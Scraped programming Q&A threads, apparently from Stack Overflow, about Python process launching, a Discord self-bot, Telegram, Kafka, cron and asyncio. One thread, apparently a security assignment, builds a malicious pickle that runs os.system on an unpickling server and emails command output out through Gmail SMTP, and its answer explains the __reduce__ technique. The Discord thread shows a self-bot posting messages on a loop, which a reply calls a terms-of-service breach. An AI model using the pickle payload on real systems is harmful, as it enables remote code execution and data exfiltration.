Friends, I am making a discord script using python I have to run this script multiple times with different parameters, I am trying that with os, threading, multiprocessing. when I am trying with this library that works only for first data Then it stuck, My code is below, please advise me.
note:- I am login as a user.
CSV file demo
auth-token1,channel-id1-1,channelid1-2
auth-token2,channel-id2-1,channelid2-2
...
...
main.py
import os
import csv
from time import sleep
import threading
import multiprocessing
rows = []
with open('data.csv', 'r') as csvfile:
# creating a csv reader object
csvreader = csv.reader(csvfile)
# extracting each data row one by one
for row in csvreader:
rows.append(row)
for _ in rows:
li = _[1:]
cmd = _[0]
for i in li:
cmd = cmd+" "+str(i)
print(f'python3 script.py {cmd}')
os.system(f'python3 script.py {cmd}')
sleep(10)
script.py
import time
import os
import sys
from time import sleep
import os
from discord import Permissions, message
import discord
import logging
import sys
argumentList = sys.argv
print(argumentList[1:])
TOKEN_AUTH = argumentList[1]
os.environ['TZ'] = 'Asia/Kolkata'
time.tzset()
logging.basicConfig(handlers=[logging.FileHandler(filename="./discord.txt",
encoding='utf-8', mode='a+')],
format="%(asctime)s %(name)s:%(levelname)s:%(message)s",
datefmt="%F %A %T",
level=logging.INFO)
channel = None
client = discord.Client()
ids = argumentList[2:]
sleep_time = 121
message = "enter your message"
#client.event
async def on_ready():
global channel
while True:
for _ in ids:
try:
channel1 = client.get_channel(int(_))
await channel1.send(message)
logging.info('1')
print('sleeping')
sleep(sleep_time*60)
except:
client.run(TOKEN_AUTH, bot=False)
client.run(TOKEN_AUTH, bot=False)
It is against Discord TOS to use bot=False otherwise known as a self bot (user)
All I will say is d.py is asynchronous and parts of your code are synchronous which is blocking.
client.run() is also a blocking method which is why your main.py stops running after the first run. Everything you do, with discord bots, needs to be async and within the client loop.
I recommend you rethink exactly what you are trying to do and do something that is not breaking their Terms of Service.
The reason because you are using ( client.run ) , this method will block the lines after it .
if you want to send messages in any place in your code ,
check this solution ^_^ :
client.run("TOKEN") blocking issue (python & discord.py)
Related
I'm working on a mac. I get a Permission denied exception when running code. How do I run one python file inside the main python file?
import os
import telebot
from telebot import types
# --------------------------\ project files /-------------------------#
from auth_data import token, txt
bot = telebot.TeleBot(token)
# first launch, start of work
#bot.message_handler(commands=['start', 'help'])
def welcome(message):
markup = types.InlineKeyboardMarkup(row_width=1)
parse = types.InlineKeyboardButton('📩Get messages📩', callback_data='parse')
markup.add(parse)
photo = open('menu.jpg', 'rb')
bot.send_photo(message.chat.id, photo, caption=txt, reply_markup=markup, parse_mode="HTML")
# menu
#bot.callback_query_handler(func=lambda call: True)
def callback(call):
if call.message:
if call.data == 'parse':
os.system('/Users/valiev/code/python/telegram_bot_parser/parser.py')
if __name__ == '__main__':
bot.infinity_polling(none_stop=True, interval=0)
You are not running the file, but opening it. Try changing
os.system('/Users/valiev/code/python/telegram_bot_parser/parser.py')
to
os.system('python3 /Users/valiev/code/python/telegram_bot_parser/parser.py')
# importing the required libraries from time import sleep
from json import dumps
from kafka import KafkaProducer
# initializing the Kafka producer
my_producer = KafkaProducer( bootstrap_servers = ['localhost:9092'], value_serializer = lambda x:dumps(x).encode('utf-8') )
# generating the numbers ranging from 1 to 500
for n in range(10):
my_data = {'num' : n}
my_producer.send('testnum', value = my_data)
sleep(1)
for n in range(10):
if(n%2==0):
json_data= {'num' :n}
my_producer.send('testnum1',value = json_data)
sleep(1)
Could any one help me to set log for this file.
You've not printed anything, but if you want a log file, use python logging module, or simple shell redirection
python producer.py > out.log
I'm currently working on a script for my sensor on my Raspberry Pi. The code underneath should get the values of my sensor and write it into a the data.json file. My problem is, if I run the scipt with my the Thonny editor everything works but if I add the script to my crontab menu the data does not get written to the data.json file.
The Code:
import time
import board
import adafruit_dht
import psutil
import io
import json
import os
from gpiozero import LED
from datetime import date
from datetime import datetime
# We first check if a libgpiod process is running. If yes, we kill it!
for proc in psutil.process_iter():
if proc.name() == "libgpiod_pulsein" or proc.name() == "libgpiod_pulsei":
proc.kill()
sensor = adafruit_dht.DHT11(board.D23)
# init
temp_values = [10]
hum_values = [10]
counter = 0
dataLED = LED(13)
dataList = []
def errSignal():
for i in range(0,3):
dataLED.on()
time.sleep(0.1)
dataLED.off()
time.sleep(0.1)
#on startup
def runSignal():
for i in range(0,5):
dataLED.on()
time.sleep(0.2)
dataLED.off()
time.sleep(0.2)
def getExistingData():
with open('data.json') as fp:
dataList = json.load(fp)
print(dataList)
def startupCheck():
if os.path.isfile("data.json") and os.access("data.json", os.R_OK):
# checks if file exists
print("File exists and is readable.")
# get json data an push into arr on startup
getExistingData()
else:
print("Either file is missing or is not readable, creating file...")
# create json file
with open("data.json", "w") as f:
print("The json file is created.")#
def calc_avgValue(values):
sum = 0
for iterator in values:
sum += iterator
return sum / len(values)
def onOFF():
dataLED.on()
time.sleep(0.7)
dataLED.off()
# data led blinking on startup
runSignal()
# checks if file exists
startupCheck()
while True:
try:
temp_values.insert(counter, sensor.temperature)
hum_values.insert(counter, sensor.humidity)
counter += 1
time.sleep(6)
if counter >= 10:
print(
"Temperature: {}*C Humidity: {}% ".format(
round(calc_avgValue(temp_values), 2),
round(calc_avgValue(hum_values), 2)
)
)
# get time
today = date.today()
now = datetime.now()
# create json obj
data = {
"temperature": round(calc_avgValue(temp_values), 2),
"humidity": round(calc_avgValue(hum_values), 2),
"fullDate": str(today),
"fullDate2": str(today.strftime("%d/%m/%Y")),
"fullDate3": str(today.strftime("%B %d, %Y")),
"fullDate4": str(today.strftime("%b-%d-%Y")),
"date_time": str(now.strftime("%d/%m/%Y %H:%M:%S"))
}
# push data into list
dataList.append(data)
# writing to data.json
with open("data.json", "w") as f:
json.dump(dataList, f, indent=4, separators=(',',': '))
# if data is written signal appears
onOFF()
print("Data has been written to data.json...")
counter = 0
except RuntimeError as error:
continue
except Exception as error:
sensor.exit()
while True:
errSignal()
raise error
time.sleep(0.2)
Crontab Menu:
The line in the center is the script.
Investigation areas:
Do not put & in crontab, it serves no purpose.
You should capture the output of your scripts to see what is going on. You do this by adding >/tmp/stats.out 2>/tmp/stats.err (and similar for the other 2 lines). You will see what output and errors your scripts encounter.
cron does not run your scripts in the same environment, and from the same directory you are running them. Load what you require in the script.
cron might not have permissions to write into data.yml in the directory it is running from. Specify a full path, and ensure cron can write in that directory.
Look at https://unix.stackexchange.com/questions/109804/crontabs-reboot-only-works-for-root for usage of #reboot. Things that should occur at startup should be configured through systemd or init.d (I do not know what Rasperry Pie uses vs distro). Cron is to schedule jobs, not run things at startup.
It could be as simple as not having python3 in the PATH configured in cron.
I have an assignment to send a pickle file to a server which unpickles anything sent to it. My plan is to have it email me back the ls command printed out. I have this file:
import smtplib
import commands
status, output = commands.getstatusoutput("ls")
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.login("...#gmail.com", "password")
server.sendmail("...#gmail.com", "...#gmail.com", output)
server.quit()
How can I get the server to run this? I am trying to send a file like:
cos
system
(S''
tR.
with the python script in the ' '.
I was thinking something like:
cos
system
(S'python\n import smptlib\n ...'
tR.
but it doesn't execute the commands. How can I make it execute the python?
I've tried on my own computer and the python sends the email fine.
Do whatever friendlyness you want to do in the __reduce__ method. Please don't be evil.
import pickle
class Friendly:
def __reduce__(self):
return (self.friendly, ('executing friendly code',))
#staticmethod
def friendly(x):
print(x)
pickle.dump(Friendly(), open('pickled', 'wb'))
print('loading ...')
pickle.load(open('pickled', 'rb'))
->
$ python friendly.py
loading ...
executing friendly code
I'm trying to understand how to use the new AsyncIO functionality in Python 3.4 and I'm struggling with how to use the event_loop.add_reader(). From the limited discussions that I've found it looks like its for reading the standard out of a separate process as opposed to the contents of an open file. Is that true? If so it appears that there's no AsyncIO specific way to integrate standard file IO, is this also true?
I've been playing with the following code. The output of the following gives the exception PermissionError: [Errno 1] Operation not permitted from line 399 of /python3.4/selectors.py self._epoll.register(key.fd, epoll_events) that is triggered by the add_reader() line below
import asyncio
import urllib.parse
import sys
import pdb
import os
def fileCallback(*args):
pdb.set_trace()
path = sys.argv[1]
loop = asyncio.get_event_loop()
#fd = os.open(path, os.O_RDONLY)
fd = open(path, 'r')
#data = fd.read()
#print(data)
#fd.close()
pdb.set_trace()
task = loop.add_reader(fd, fileCallback, fd)
loop.run_until_complete(task)
loop.close()
EDIT
For those looking for an example of how to use AsyncIO to read more than one file at a time like I was curious about, here's an example of how it can be accomplished. The secret is in the line yield from asyncio.sleep(0). This essentially pauses the current function, putting it back in the event loop queue, to be called after all other ready functions are executed. Functions are determined to be ready based on how they were scheduled.
import asyncio
#asyncio.coroutine
def read_section(file, length):
yield from asyncio.sleep(0)
return file.read(length)
#asyncio.coroutine
def read_file(path):
fd = open(path, 'r')
retVal = []
cnt = 0
while True:
cnt = cnt + 1
data = yield from read_section(fd, 102400)
print(path + ': ' + str(cnt) + ' - ' + str(len(data)))
if len(data) == 0:
break;
fd.close()
paths = ["loadme.txt", "loadme also.txt"]
loop = asyncio.get_event_loop()
tasks = []
for path in paths:
tasks.append(asyncio.async(read_file(path)))
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
These functions expect a file descriptor, that is, the underlying integers the operating system uses, not Python's file objects. File objects that are based on file descriptors return that descriptor on the fileno() method, so for example:
>>> sys.stderr.fileno()
2
In Unix, file descriptors can be attached to files or a lot of other things, including other processes.
Edit for the OP's edit:
As Max in the comments says, you can not use epoll on local files (and asyncio uses epoll). Yes, that's kind of weird. You can use it on pipes, though, for example:
import asyncio
import urllib.parse
import sys
import pdb
import os
def fileCallback(*args):
print("Received: " + sys.stdin.readline())
loop = asyncio.get_event_loop()
task = loop.add_reader(sys.stdin.fileno(), fileCallback)
loop.run_forever()
This will echo stuff you write on stdin.
you cannot use add_reader on local files, because:
It cannot be done using select/poll/epoll
It depends on the operating system
It cannot be fully asynchronous because of os limitations (linux does not support async fs metadata read/write)
But, technically, yes you should be able to do async filesystem read/write, (almost) all systems have DMA mechanism for doing i/o "in the background". And no, local i/o is not really fast such that no one would want it, the CPU are in the order of millions times faster that disk i/o.
Look for aiofile or aiofiles if you want to try async i/o